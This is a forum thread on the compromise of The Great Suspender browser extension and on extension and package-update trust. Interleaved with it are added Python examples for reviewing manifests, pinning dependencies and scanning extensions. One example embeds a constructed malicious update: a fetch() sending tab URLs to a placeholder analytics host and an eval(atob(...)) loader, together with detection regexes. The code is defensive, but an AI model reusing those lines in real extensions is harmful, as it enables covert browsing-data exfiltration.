Extensions these days go through a rigorous review process, and Google regularly shuts down / imposes arbitrary restrictions against extensions due to changing policies.

I understand the importance of strong moderation to protect users from malicious extensions, but I believe Google is using that as an excuse to further lock down their store, increasing barriers to entry and making it harder for developers to build software to extend the most popular browser in the world without Google's blessing.


I hadn't looked at it for a while, so I just did so.

You're right...it won't let me update it now without a lot of justifications on their privacy tab. However, it is still published. The status is "Status: Published - unlisted", so I can't search for it, but I can go direct to the store url for it.


Yeah, that matches up with what I've seen. They've at least been decent enough not to kick people off the store, but I don't think it's possible to just have them sign / publish something unlisted these days without a good deal of policy writing and justifications.

Yet the large actors still publish malicious updates to extensions. ¯\_(ツ)_/¯


They have this "private" feature now where you have to list the email addresses of people that are allowed to use the extension. I don't see why that couldn't be coupled with "no review required", so long as the list is relatively short. But, yeah, likely will never happen.

Fortunately for me, I can re-do my extension to use the JS postMessage API, which will hardly require any permissions, and thus, not much to review.


I'm pretty sure if you enable Extension Developer Mode, you won't get that nagging message on launch.


This sounds right. I've got Developer Mode on for my own custom written extensions and don't have mine disabled at all.


There is another problem with sideloading the extension: you don't have cloud sync anymore, which forces you to sideload on every computer you have.


I'd switch to firefox but it is noticeably slower loading facebook and twitter, the sites I go to most often, and I trust it only like 25% more than chrome. :/


More discussion on GitHub: https://github.com/greatsuspender/thegreatsuspender/issues/1...

Quite similar to what happened to Nano Adblocker/Defender a few months ago.


The MS Edge dev channel has a basic form of tab suspending built into it now. Based on my non-rigorous testing it seems to actually save more memory than TGS ever did so I just removed the extension entirely.

It is really a shame that basic functionality like this isn't built into more browsers and we have to rely on extensions to fill the gaps just to keep memory usage under control for tab-a-holics like myself. :(


Chromium-based browsers and Firefox have discarding built-in.

chrome://discards/ has some advanced options (in Chromium-based browsers).

Funnily enough, Google mentions The Great Suspender as inspiration for this feature in the August 2015 changelog: https://developers.google.com/web/updates/2015/09/tab-discar...

> We actually had a great chat with the author of the Great Suspender extension while developing tab discarding and they're glad to see us natively tackling this problem in ways that are more efficient than an extension might be able to, such as losing the state of your user interactions.


In fact tab suspending/discarding has been built into Chrome for some time now and Great Suspender does optionally make use of the built-in functionality.

I still sometimes use extensions like Great Suspender to give more control over the process (e.g. to suspend more aggressively on RAM-constrained machines or where the user uses a lot of tabs).

Since this news came out I have switched to "Auto Tab Discard".


The functionality is built-into Chrome, the native tab discarding just happens when it thinks memory pressure is too high. Extensions like this give you extra granularity to set it to happen after a timer.


> It is really a shame that basic functionality like this isn't built into more browsers and we have to rely on extensions to fill the gaps just to keep memory usage under control for tab-a-holics like myself. :(

The way I see it, extension developers get to come up with innovative new features first, and then the first-party vendors like Apple, Google, and Microsoft take note and eventually do just that: Integrate it into their own products.

For example: The Great Suspender → Sleeping Tabs [experimental] (Microsoft/Edge); Flux → Night Shift (Apple/iOS); Growl → macOS Notifications (Apple/macOS); Swype → iOS Built-in Keyboard (Apple/iOS); etc

Edit: Fix formatting.


I recently switched to Auto Tab Discard.[1] It uses the browser's built-in tab suspending. It doesn't have all the features of TGS, though.

Edit: OneTab[2] is also pretty good when you have lots of tabs open for research or work.

[1]: https://github.com/rNeomy/auto-tab-discard

[2]: https://www.one-tab.com/


Has anyone here used Tabs Outliner?

I used to use TGS excessively and TabsOutliner has completely changed my workflow. Now I just sort tabs into categories and then kill the entire window until I am in that context.

It sorta looks dated, but I find it amazing:

https://chrome.google.com/webstore/detail/tabs-outliner/eggk...


I personally use OneTab but it's worth noting that in the GH issue on TheGreatSuspender there's some ongoing (and mostly unsubstantiated, in this thread) concerns about OneTab's data collection and management[0].

[0] https://github.com/greatsuspender/thegreatsuspender/issues/1...


I wouldn't say it is "unsubstantiated".

Sharing bookmarks, is not the same as "sharing it with anyone in the world" - without any notification.


It is "mostly unsubstantiated" because the thread makes multiple claims without proof. The bookmark pages on Google provide some evidence for one of the claims but it is, by no means, proof of the claim's validity.


I've been using it for the last few weeks, and it's been pretty good so far. It doesn't suspend music tabs when they're not playing (which TGS did automatically), but nothing much to complain about.


Perfect! I was looking for [1] the other day. Plays nicely with Sidebery, which uses the same API but can't do "unload all other tabs".


In Chrome, make sure you set your less frequently used extensions to run "On click" instead of "On all sites". Extensions -> extension details -> Site access.

For dev tools and such, I set a whitelist of the sites they're allowed to run on, using that same extension details page. There's no need for your JSON formatter etc. to run on every single page you visit. Also speeds up browsing.


Among other things, this is why when people say "HN doesn't need a dark mode, just use an extension", that isn't a valid solution. For years now I've refused to install any extensions that aren't too-big-to-compromise (which in practice - for me - means AdBlock Plus and maybe React Dev Tools), and that should be everyone's policy. Any extension whose compromise wouldn't damage the reputation of a billion-dollar organization is simply too juicy of an attack vector.


It's funny you mention AdBlock Plus but not uBlock Origin in this situation. I'd say the latter is much, much better than the former.


But is it better known? That's the determining factor here. The Great Suspender was well-regarded in certain circles, and even fairly well-known (I've never used it but I've heard of it). But even it apparently wasn't above compromise. To be reasonably safe, an extension has to either be a) so well-known that they'd never be able to get away with silently adding malware (because someone would notice, which to be fair is what happened here), or b) tied to a major brand that wouldn't want to sell out to some shady firm, on PR grounds alone.


I see the distinction you are making, but there are many people (here especially) whose definition of "compromised" is not limited to malware (or whose definition of "malware" is not limited to what is happening with TGS).


I agree that extension security isn't considered nearly as often as it should be, though my barrier isn't quite yours. For me, it comes down to developer trust and permissions. If someone I trust wrote a small, feature-targeted extension, I would probably be comfortable installing it. Similarly, if the permissions an extension has are tightly scoped to its use case, I'm more comfortable installing it.

Now that I write that, I'm not sure how permissions and upgrades go together. If an extension that had tight permissions relaxes them I'd get notified before they took effect, right?
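The check behind that question (and behind the earlier reply that a release requiring new permissions is disabled until the user consents) can be done by hand before accepting an update: diff the two manifests. The example below is added here and is not code from any extension or from Chrome or Firefox; it is a reviewer's approximation that treats the rule as a set difference over API permissions and over host match patterns, with `<all_urls>` and `*://*/*` covering every host. It ignores URL scheme and path parts, handles both the MV2 layout (hosts mixed into `permissions`) and the MV3 layout (`host_permissions`), and makes no attempt to reproduce which permissions the browsers consider warning-free. The manifests at the bottom are constructed for the example.

```python
"""Diff the permissions of two versions of an extension manifest and say
whether the update can do anything the previous version could not.
Added example; assumptions are noted in the comments."""
import json

ALL_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def split_permissions(manifest):
    """Return (api_permissions, host_patterns) for an MV2 or MV3 manifest."""
    perms = set(manifest.get("permissions", []))
    hosts = {p for p in perms if p == "<all_urls>" or "://" in p}
    hosts |= set(manifest.get("host_permissions", []))  # MV3 keeps hosts separate
    return perms - hosts, hosts


def pattern_host(pattern):
    """Host part of a match pattern; '<all_urls>' becomes '*'."""
    if pattern == "<all_urls>":
        return "*"
    return pattern.partition("://")[2].split("/", 1)[0]


def host_covered(pattern, granted):
    """True if `pattern` grants nothing beyond what the patterns in `granted` already do.
    Simplification: scheme and path are ignored, only the host is compared."""
    if granted & ALL_HOSTS:
        return True
    want = pattern_host(pattern)
    if want == "*":
        return False
    bare = want[2:] if want.startswith("*.") else want
    for g in granted:
        have = pattern_host(g)
        if have == want:
            return True
        # '*.example.org' covers 'example.org', 'api.example.org' and '*.api.example.org'.
        if have.startswith("*.") and (bare == have[2:] or bare.endswith(have[1:])):
            return True
    return False


def permission_delta(old_manifest, new_manifest):
    """What the new version can do that the old one could not."""
    old_api, old_hosts = split_permissions(old_manifest)
    new_api, new_hosts = split_permissions(new_manifest)
    added_api = sorted(new_api - old_api)
    added_hosts = sorted(h for h in new_hosts if not host_covered(h, old_hosts))
    return {"added_api": added_api, "added_hosts": added_hosts,
            "escalates": bool(added_api or added_hosts)}


def delta_from_files(old_path, new_path):
    """Same check for two manifest.json files on disk, e.g. two downloaded releases."""
    with open(old_path, encoding="utf-8") as a, open(new_path, encoding="utf-8") as b:
        return permission_delta(json.load(a), json.load(b))


# Constructed manifests, not from any real extension.
OLD_MV2 = {"manifest_version": 2, "version": "7.1.0",
           "permissions": ["tabs", "storage", "https://*.example.org/*"]}
NEW_MV2 = {"manifest_version": 2, "version": "7.2.0",
           "permissions": ["tabs", "storage", "webRequest",
                           "https://api.example.org/*", "<all_urls>"]}
OLD_MV3 = {"manifest_version": 3, "version": "1.0", "permissions": ["tabs"],
           "host_permissions": ["https://*.example.org/*"]}
NEW_MV3 = {"manifest_version": 3, "version": "1.1", "permissions": ["tabs"],
           "host_permissions": ["https://*.example.org/*", "https://cdn.example.org/*"]}
```

For the constructed MV2 pair the delta is `webRequest` plus `<all_urls>` (the new `api.example.org` pattern is already covered by the old `*.example.org`), so that update would escalate; the MV3 pair only adds a host under an already-granted wildcard and does not. The practical point is the inverse of the question above: an update that keeps the same permissions raises no prompt at all, which is exactly the case where a tracking beacon to a host already covered by a broad pattern slips through silently.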


> Disable analytics tracking by opening the extension options for The Great Suspender and checking the box “Automatic deactivation of any kind of tracking”.

> Pray that the shady developer doesn’t issue a malicious update to The Great Suspender later. (There’s no sensible way to disable updates of an individual extension.)

Does Debian ship packages for individual browser extensions?

I mean, if they do I'm sure it's not scalable and-- after spending time reading debuild manual-- a giant, archaic pain in the ass.

On the other hand, all these app delivery systems are so damned pernicious and require constant vigilance. We may have arrived at a moment in time where this is actually a difficult decision:

* pay somebody a living wage to burrow down into Debian's WoT bureaucracy and add at least a selection of this functionality without phoning home

* continue playing the most tedious game of whackamole with a whackamole game that mines all our data in order to learn how best to beat all users at whackamole


> Does Debian ship packages for individual browser extensions?

They do, for a couple of more notable ones (HTTPS Everywhere, uBlock Origin, Proxy Switcher, etc.) [0]

> I mean, if they do I'm sure it's not scalable and-- after spending time reading debuild manual-- a giant, archaic pain in the ass.

The biggest problem is to find a person to be a maintainer that is willing to keep up with the upstream development.

[0] https://packages.debian.org/search?keywords=webext-&searchon...


Thanks, that's good to know.

> The biggest problem is to find a person to be a maintainer that is willing to keep up with the upstream development.

That sounds like the kind of job someone does in return for money.


It seems auto-updating browser extensions are riskier than leaving them non-updated?


Blindly letting anything auto-update.


Auto-update is a mixed bag. We got into auto-update as a standard practice over the last decade because a large fraction of users never updated anything, so security issues would linger forever (not to mention ancient software versions holding back platform technologies, and financial concerns for software shops).

So it's not that auto-update is flatly a bad idea, it's more that it's a trade-off that sometimes makes security issues almost evaporate, and sometimes makes them impossible to dodge.


I think the difference with browser extensions is the anonymity and speed of changing owners. There's more momentum to notice big companies going downhill (+- stuff like sourceforge)


...which happens all the time in the free software world, when you type `apt-get|yum|brew update`.

What are the odds of one dependency being taken over by a shady anonymous entity?


Packages in the default repos for some large Linux distro are usually reviewed and tested by many people until they make it into updates for current stable version, so while it's probably not entirely impossible for some malicious code to get in, it seems pretty unlikely. Unlike browser extensions, where the current owner can upload anything they want and it's pushed to the users without them even knowing.


How about `npm`, `pip`, `cpan`?...

We have seen bad updates breaking the entire Javascript ecosystem, but they were not intentional.

All it takes to inject a bad dependency is a burned out developer willing to delegate his free project to someone else...


The fact that you have to manually type in `apt-get update` (or similar) means it's not automatic. You have full control over when the update takes place, and which packages get updated.


When discussing software updates, I feel like folks on HN commonly overestimate how much impact opportunity for controlling updates has. I haven't seen someone in my social/professional circles ever hesitate before applying an apt-get update. Nobody I've known checks changelogs (except developers checking on direct dependencies), nobody reads the patches for the updates to verify nothing malicious slipped in. "There's an update, I'd better apply it, unless it smells like a breaking change."

So in practical terms, my experience is that vanishingly few people will behave differently than an auto-update system would behave, except in rare occasions like a malicious update making the headlines. We definitely need a solution for rejecting malicious updates, but I feel backing away from auto updates throws the baby out with the bathwater and would be a net-negative change for the industry and for users.


There are exceptions but I think that’s true in the same way people tell their doctor they eat well, exercise daily, and go to sleep on time every night — aspirational, almost certainly discounting the times it doesn’t happen as exceptions and ignoring the actual frequency. The most I’ve seen people consistently do is delay a little in case an update is pulled, and statistically nobody does the kind of analysis that you’d need to catch an unadvertised change.


There's also the occasional _necessity_ for making a breaking change, in particular _breaking some exploit_ and thereby making the software more secure.

I don't envy Chrome leadership's decision or having that problem to solve.


I don't think the question is about control but rather whether automatic updates, when intentionally activated by the user, contribute more positively to the system's security than negatively.

Without automatic updates, you might be more inclined to put off a patch which turns out to be urgent. Or you might be more likely to lose track of which patches have been applied across your various systems.


It's more the chance of an unexpected breaking change. When you use a package manager, you're expecting stuff to change (and get to review what's changing).

Upgrading manually regularly: Good idea.

Having a cronjob to do it automatically without user intervention: Bad idea.


I recently had to install Certbot on a CentOS 8 server and discovered that the Certbot documentation recommends using Snap (for almost every popular GNU/Linux release). They have their reasons[1]. I figured it was time to investigate using Snap and the benefits it could provide.

While researching, I found many users reporting that forced updates of software installed by Snap caused many problems and I decided against using it; I was able to install Certbot via a good old-fashioned RPM from EPEL.

I also removed Snap from a different Ubuntu server which had recently been upgraded to 20.04 (I wasn't using LXD on that server so there was no need for it).

1. https://community.letsencrypt.org/t/how-to-install-certbot-w...

FWIW, I've been allowing Apt and Yum package managers to automatically update for about 8 years without any problems. The only manual OS updating I do is for a set of physical (non-virtual) servers that are operational 24/7.


It'll be a "great" day when someone manages to do big damage with code that Google hosted and delivered to the victims... IMO it's just a matter of time.


Just sent him this email:

Saw your article via HN.

As an easier permanent fix, just uninstall The Great Suspender and install Auto Tab Discard (https://add0n.com/tab-discard.html). It does the same thing.

It's available on:

Firefox - Auto Tab Discard – Get this Extension for Firefox (en-US)(https://addons.mozilla.org/en-US/firefox/addon/auto-tab-disc...)

Edge - Auto Tab Discard - Microsoft Edge Addons (https://microsoftedge.microsoft.com/addons/detail/auto-tab-d...)

or even if you're still using Chrome - Auto Tab Discard - Chrome Web Store (https://chrome.google.com/webstore/detail/auto-tab-discard/j...)


Discarding inactive tabs is not what I use The Great Suspender for. I use it to... suspend tabs. Auto Tab Discard doesn't seem to do that.


What is the difference?

From the website it sounds like the favicon is changed. So the tab doesn’t go away it’s just on pause

Google: “a discarded tab doesn't go anywhere. We kill it but it's still visible on the Chrome tab strip. If you navigate back to a tab that's been discarded, it'll reload when clicked. Form content, scroll position and so on are saved and restored the same way they would be during forward/backward tab navigation.”

In the future this will be updated to also use a serializer for discarded tabs.


Discard doesn't mean "remove" in this context. It will unload the tab, but still keep the state for when you switch back to it. E.g. suspend it.


Discarding the tab is superior to what Great Suspender used to do. Why would you want the old behaviour?

Tab discarding is just a more efficient, native implementation of what Great Suspender aimed to do in the first place.


I don't use Chrome so I have no idea what either of these extensions did, but FF's implementation of tab discarding causes it to reload the page when I switch to the tab, which means I have to wait for the page to load before I can do whatever I wanted to do.

I'd much rather have a way to just stop all JS on a "suspended" tab so that FF doesn't burn 20% CPU on tabs that aren't even visible. (Yes I'm aware that JS timers, etc operate at reduced frequency for unfocused tabs. I'm talking about stopping them entirely.) Discarding may be more efficient for the browser but it's less efficient for me the user, so I don't use it.


Fair enough, although that is not what Great Suspender did. Great Suspender also causes the page to be reloaded on resumption, just like an early version of tab discarding.

Tab discarding does have the slight advantage that it remembers what you typed in on the page and where you were scrolled (but nonetheless still causes a reload).

What you are asking for regarding slowing the performance of background JS is something browsers already do: https://stackoverflow.com/questions/15871942/how-do-browsers...

Making that behaviour more aggressive seems like it is liable to cause significant problems to the user experience with minimal benefits. E.g. background media playback would likely be broken, notifications, etc. Whereas you could simply use bookmarks instead of open tabs to get the same effect (EDIT: actually tab discarding would already be better than that method as you note).


>What you are asking for regarding slowing the performance of background JS is something browsers already do

As I wrote:

>>(Yes I'm aware that JS timers, etc operate at reduced frequency for unfocused tabs. I'm talking about stopping them entirely.)

>Making that behaviour more aggressive seems like it is liable to cause significant problems to the user experience with minimal benefits. E.g. background media playback would likely be broken, notifications, etc.

I want none of those things from the "suspended" tabs.

>Whereas you could simply use bookmarks instead of open tabs to get the same effect

How? Do you mean I would load the bookmark into a new tab when I wanted to visit it? That not only has the same problem that I described for discarded tabs (have to wait for a page load), but is even worse because it loses all the context that discarded tabs do retain. Not to mention the annoyance of maintaining bookmarks for arbitrary tab groups that I just happen to have open.


Ah damn, I was about to try it to see if it actually discarded or suspended tabs.


I wish they had one that would do that based on memory or CPU usage of a tab.


Auto Tab Discard has a setting, "Discard a background tab if its memory usage (totalJSHeapSize) exceeds (in MB)"


Greyed out for me in FF. =\


Edge (dev) has built-in sleep tabs. It works quite well.


I have always used The Great Discarder instead [1]

It's by the same dev too but it uses Chrome's Native Tab Discarding feature and I found it way more efficient (at the time I started using it a few years ago - haven't compared recently).

[1] https://chrome.google.com/webstore/detail/the-great-discarde...


I like the idea of using the discard mechanism, but if it’s from the same developer, wouldn’t it be at risk of having the same thing happen?


True that's possible if it were to get popular. But since this wasn't the popular extension, it'd seem it wasn't sold off.


Great Suspender eventually added functionality to use Chrome's native tab discarding as well and so they stopped updating Great Discarder.


> Apparently recent versions of this extension have been taken over by a shady anonymous entity...

That's something that worries me, whenever I install a software with trusted privileges.

Software companies can sell their products -- and user base -- to other companies without notice.

And it can be even worse in the free software world: think about all the updates that happen when you type `apt-get|yum|brew|npm|pip update`. What are the odds of a single dependency being taken over by a shady anonymous entity?


This is why I stopped using extensions in any browser years ago unless it came from a trusted company I pay directly (i.e. 1Password). The broken economic model means that the developers always have pressure to cash in on a popular extension and Google has set things up to make abuse fast and easy with automatic silent updates and their usual skimping on human review. By the time the news about TGS came out most users already had the next release installed.


Indeed. There was never a basis for trusting The Great Suspender in the first place. "Read and change all your data" is a permission that should be reserved for code you wrote yourself.


I also got rid of quite a few browser extensions that were handy but I just couldn't bring myself to spend time trusting them.

It would be an interesting exercise to try and build an open source organisation around developing and publishing extensions in the open.


It’d also be interesting to see how much further you could go with permissions restricting access. For example, my 1Password usage needs to be able to read/write DOM element values but you could potentially say no network access or ability to create script or style elements. I’m not sure how much further sandboxing could practically be taken but it really seems like the all data, all sites permission needs to be much rarer than it currently is.


Except 1password can’t sync your database without network access :)


The desktop app does that, not the browser extension, so it should in theory be possible to avoid allowing it to inject arbitrary code which allows connections to anywhere in the browser by limiting it to localhost.

Unfortunately, I’m not sure that a reasonable UI for something like this would be feasible without everyone just being trained to click Approve. Some kind of review process could work but that’d put it back in needing Google to admit that they need to pay humans to operate a service.


I'm now curious how much money the original developer was paid to hand it over. I imagine he/she knew what the buyer's plan was.


According to the homepage of a company that buys apps, and as a first approximation, that would be "anywhere between 8x - 36x monthly revenue for apps. In most cases this is well above the standard market value of 6-12x".

Whether they are lowballing candidates with that offer, I can't say.


Why didn't browsers start warning users when an extension updated after changing owners?


<nope>The owner in the extension metadata on The Great Suspender hasn't been updated (to my understanding) so the Chrome Web Store doesn't even know that the owner has been changed.</nope>

Actually it does appear that the owner was changed from "deanoemcke" to "thegreatsuspender" (the new mystery owner) on the Chrome Web Store page.

I agree that warning when updating an extension if the stated owner has changed would be valuable.


For those interested in understanding the security of Chrome extensions, duo introduced CRXcavator (https://crxcavator.io/) a while back, which does some risk scoring around permissions. It is chrome-only, and it doesn't protect against this type of attack specifically, although you can look at the Potential External Communication section for possible issues.


Google Chrome now has tab grouping. In Beta, you can click on the group name and collapse the tabs. Based on their reload times, it seems chrome suspends the tabs in the background when you collapse the group.


This looks promising. To activate the suspend on collapse feature enter "chrome://flags/" into the address bar and make sure these experimental features are "enabled": #tab-groups, #tab-groups-collapse, #tab-groups-collapse-freezing. I also enabled: #tab-groups-auto-create.


Oh, this is awesome. I'm on Linux so I've been using Chromium, where this is already available. Pretty neat.

Edit: looks like it works in Chrome as well.


And this is why we need to rethink how we do software distribution.

Package managers are nice for the lazy, but then we get stuff like this:

https://qz.com/646467/how-one-programmer-broke-the-internet-...

Actually you might be pulling a bunch of malicious updates in 2-3 modules deep in your dependency tree anytime.

As a society we should be moving away from a culture of “immediate” updates eg on Twitter etc. And go towards more “peer review” like in science. Otherwise we are putting responsibility on every individual to verify all sides of the story and get informed. They don’t and society gets more and more divided. Imagine if a scientist tweeted at 3am and half their followers instantly believed them. Or if an open source contributor’s pull request was instantly accepted and pulled overnight by everyone. That’s why USA and other countries are now so divided politically. Individual responsibility of 100% of the downstream nodes is strange to outsource responsibility to.

I wrote about this back in 2012 predicting what would happen:

https://magarshak.com/blog/?p=114


Recently I wanted to build one of Signal’s libraries so that I could use it with signal-cli. It astonished me that building this secure messenger requires automatically downloading a whole host of third-party dependencies through wget from some disparate repositories, which presumably had received little vetting.

What happened to the notion of using stable, centralized package repositories like Debian’s or Red Hat’s in order to build one’s software? I did a lot of Free Software development in the early millennium, then was away from the scene for a few years, and when I came back this desire for convenience above all else really baffles me.


At Qbix, we have built everything in-house and the few dependencies that we do pull in, we vetted and pinned the versions. People have criticized us for that in the past but if we are ever to get past trusting large, centralized entities for our server back ends, we need to make sure to kick the open source movement to the next level:

https://qbix.com/blog/2021/01/15/open-source-communities/

https://qbix.com/blog/2018/01/17/modern-security-practices-f...
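The practice described in the post above (vet the dependencies you pull in, then pin them) and the worry upthread about malicious updates arriving two or three modules deep in the dependency tree both come down to the same check: an installer should refuse any artifact whose contents differ from what was reviewed. The following is an added example, not code from the thread or from Qbix; the package names, versions and artifact bytes are constructed stand-ins for downloaded packages.

```python
"""Hash-pinned dependency verification.

Added example, not code from the thread or from Qbix. The artifacts below are
constructed stand-ins for downloaded packages; nothing is fetched.
"""
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed: the artifact bytes that were actually reviewed when the lockfile was written.
REVIEWED = {
    "left-pad": ("1.3.0", b"left-pad 1.3.0 reviewed contents"),
    "tiny-http": ("0.9.2", b"tiny-http 0.9.2 reviewed contents"),
}

# The lockfile pins both the version and the digest of the reviewed artifact.
# A version alone is not enough: the same version string can be re-published
# with different contents by whoever controls the package.
LOCKFILE = {name: (ver, sha256_hex(data)) for name, (ver, data) in REVIEWED.items()}


def check_artifact(lockfile: dict, name: str, version: str, data: bytes) -> str:
    """Return 'ok' or the reason one fetched artifact must be refused."""
    if name not in lockfile:
        # A transitive dependency nobody reviewed: exactly the 2-3-levels-deep case.
        return "refuse: not in lockfile (unreviewed transitive dependency)"
    pinned_version, pinned_hash = lockfile[name]
    if version != pinned_version:
        return f"refuse: version drift {pinned_version} -> {version}"
    if sha256_hex(data) != pinned_hash:
        # Same name, same version, different bytes: the takeover scenario.
        return "refuse: contents differ from reviewed artifact"
    return "ok"


def verify_tree(lockfile: dict, fetched: list) -> dict:
    """Check every artifact the resolver fetched, direct and transitive alike.

    `fetched` is a list of (name, version, bytes) tuples as the resolver saw them.
    """
    return {name: check_artifact(lockfile, name, ver, data) for name, ver, data in fetched}


if __name__ == "__main__":
    # Constructed fetch results: one swapped artifact, one drifted version, one unpinned dependency.
    fetched = [
        ("left-pad", "1.3.0", b"left-pad 1.3.0 republished contents"),
        ("tiny-http", "0.9.3", REVIEWED["tiny-http"][1]),
        ("deep-dep", "2.0.0", b"never reviewed"),
    ]
    for name, result in verify_tree(LOCKFILE, fetched).items():
        print(f"{name}: {result}")
```

The install should be aborted if any entry is not "ok"; pip's `--require-hashes` mode and lockfiles in npm, Cargo and Go modules apply the same idea, and the point of the example is to show which of the three failure modes each part of the pin catches.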


Thanks for sharing.

I'm now framing the problem as "inauthentic speech".

> ...go towards more “peer review” like in science.

Ditto journalism and reporting.

This is a universal problem. The core solution remains the same.

  Cite your sources
  Show your work
  Sign your name
WRT John Walker's screed, I really thought certificates and web of trust would have become the norm by now. Anything unsigned would be treated as gossip or worse. Certs could be revoked as needed.

Further, every trusted digital relationship would start with a key exchange. Vs relying on username and password. eg Banks would issue me a Secure Enclave of some sort, like a USB fob.

I'd like to understand why this didn't happen. My best guess is "Worse is better" enabled predators and parasites. Which has been acceptable during the gold rush.


There was a recent paper published at ACM CCS 2020 that attempts to identify malicious changes to extension updates. Might be worth a read.

You’ve Changed: Detecting Malicious Browser Extensions through their Update Deltas

https://dl.acm.org/doi/10.1145/3372297.3423343


I disable automatic updates for all extensions, as well as personally reviewing the source of every extension before installation.

The review doesn't take much time. What I look for:

  1. The manifest for what network endpoints the extension is allowed to call.
  2. Any URL in the code that is external to the extension.
  3. Any remote network function (fetch/XHR/links) and traceback to the call sites.
  4. Whether there is any obfuscated code or not.
If anything found in those spots seems fishy / unclear, I don't install the extension.

Takes a few minutes, but catches most of the threat vectors. Skimming the code also gives me a sense of what sort of developer is behind the extension. Some code clearly shows a developer cares about privacy and / or security, which unconsciously adds karma for that dev in my book.

Like others above, I don't use many extensions, but those I use I have to trust.
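The four-point checklist above (manifest permissions, external URLs, network call sites, obfuscation) and the ACM CCS paper a few comments up on catching malicious changes through update deltas fit together: run the same static review on two versions and diff the results. Below is an added example of that, not code from the thread, from the paper or from any extension named here. The two manifests and scripts are constructed samples; the `collector.analytics.example` host and the `blob` variable are placeholders, not anything observed in a real extension.

```python
"""Static pre-install review of a browser extension, plus the delta between two versions.

Added example, not code from the thread or from any extension it names. The
manifests and scripts below are constructed samples; nothing is downloaded.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Permissions and match patterns that amount to "read and change all your data".
BROAD_PERMISSIONS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*",
                     "tabs", "webRequest", "webRequestBlocking", "cookies", "history"}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
NETWORK_CALL_RE = re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon|WebSocket)\s*\(")
# Dynamic code loading or long hex-escaped runs are the usual obfuscation tells.
OBFUSCATION_RE = re.compile(r"\b(?:eval|Function|atob|unescape)\s*\(|(?:\\x[0-9a-fA-F]{2}){8,}")


@dataclass
class Review:
    permissions: set      # manifest permissions plus content-script match patterns
    hosts: set            # hostnames of URLs found in the code
    network_calls: list   # (file, line, api)
    obfuscation: list     # (file, line, snippet)


def review_extension(manifest: dict, scripts: dict) -> Review:
    """Step 1 of the checklist reads the manifest; steps 2-4 scan every script line."""
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        perms |= set(cs.get("matches", []))
    hosts, calls, obf = set(), [], []
    for name, src in scripts.items():
        for no, line in enumerate(src.splitlines(), 1):
            for url in URL_RE.findall(line):
                hosts.add(urlparse(url).hostname)
            m = NETWORK_CALL_RE.search(line)
            if m:
                calls.append((name, no, m.group(1)))
            if OBFUSCATION_RE.search(line) or len(line) > 500:
                obf.append((name, no, line.strip()[:60]))
    return Review(perms, hosts, calls, obf)


def findings(r: Review) -> list:
    """Human-readable list of everything a reviewer should look at."""
    out = [f"broad permission: {p}" for p in sorted(r.permissions & BROAD_PERMISSIONS)]
    out += [f"remote host in code: {h}" for h in sorted(r.hosts)]
    out += [f"network call: {f}:{n} {api}" for f, n, api in r.network_calls]
    out += [f"possible obfuscation: {f}:{n} {s}" for f, n, s in r.obfuscation]
    return out


def acceptable(r: Review) -> bool:
    """The rule from the checklist: anything reaching out or hiding code blocks the install."""
    return not (r.hosts or r.network_calls or r.obfuscation)


def update_delta(old: Review, new: Review) -> dict:
    """What a new version adds; this is what an auto-update would have applied silently."""
    return {
        "new_permissions": sorted(new.permissions - old.permissions),
        "new_hosts": sorted(new.hosts - old.hosts),
        "new_network_calls": [c for c in new.network_calls if c not in old.network_calls],
        "new_obfuscation": [o for o in new.obfuscation if o not in old.obfuscation],
    }


# Constructed sample: a benign first version of a tab utility.
V1_MANIFEST = {
    "manifest_version": 2, "name": "Sample Tab Tool", "version": "1.0",
    "permissions": ["tabs", "storage"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
    "background": {"scripts": ["background.js"]},
}
V1_SCRIPTS = {
    "background.js": "chrome.tabs.onUpdated.addListener(function (tabId) {\n"
                     "  chrome.storage.local.set({last: tabId});\n});\n",
    "content.js": "document.title = document.title;\n",
}
# Constructed sample: a later version that a delta review should flag
# (new permission, a beacon to a remote host, dynamically evaluated code).
V2_MANIFEST = dict(V1_MANIFEST, version="1.1", permissions=["tabs", "storage", "webRequest"])
V2_SCRIPTS = dict(V1_SCRIPTS)
V2_SCRIPTS["background.js"] = V1_SCRIPTS["background.js"] + (
    "// constructed lines for the example, not taken from any real extension\n"
    "fetch('https://collector.analytics.example/v1/visit?t=' + encodeURIComponent(tab.url));\n"
    "eval(atob(blob));\n"
)

if __name__ == "__main__":
    old, new = review_extension(V1_MANIFEST, V1_SCRIPTS), review_extension(V2_MANIFEST, V2_SCRIPTS)
    print("v1 findings:", findings(old), "acceptable:", acceptable(old))
    print("v2 findings:", findings(new), "acceptable:", acceptable(new))
    print("update delta:", update_delta(old, new))
```

Run against an unpacked extension, `scripts` would be the contents of each `.js` file listed in the manifest (and every file they reference, since a loader script can pull in the interesting one). The regexes are deliberately coarse: a review like this is meant to tell you where to read, not to replace reading, and a hit on `fetch` to the extension's own update endpoint is fine once you have traced the call site, which is why the checklist pairs the call with its callers.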


Ironically, I tracked the real world identity of someone using stolen credit cards in my ecom site BECAUSE he posted a tutorial/how-to on YouTube showing the vulnerability tool (script kiddie), under his real name. SMH. This won't stop this information from being disseminated, but it may save some idiots from themselves.


By the way, is there an extension (I'm interested in both Firefox and Chrome) which would force all the new (background) tabs to be created in the suspended state (like if you had opened them in background and then restarted the browser) and only start loading after you actually open them?


Auto Tab Discard adds an option to your right click menu "Open in Discarded Tab"


Thank you very much! Not really a perfect solution (you still have to make many clicks, I just use MiddleClick or Ctrl+LeftClick to open a background tab normally) but a really great extension nevertheless. I'm very happy to discover it.


Ditto


Same here!


More detailed information can be found here: https://github.com/greatsuspender/thegreatsuspender/issues/1...


Either the second or third time it lost all my tabs was when I stopped trusting it.


Lifehack: export your suspended tabs as a flat file through the interface, uninstall the add on, then follow the downgrade as the blog suggests, at the end reimport your tabs from the flat file


Doesn't chrome already suspend background tabs without a plugin? At least I'm unable to properly have browser games running unless they're in a visible tab.


Browser games, implemented in Javascript, usually depend on requestAnimationFrame, which is not executed in background tabs. See https://developer.mozilla.org/en-US/docs/Web/API/window/requ... for more info.


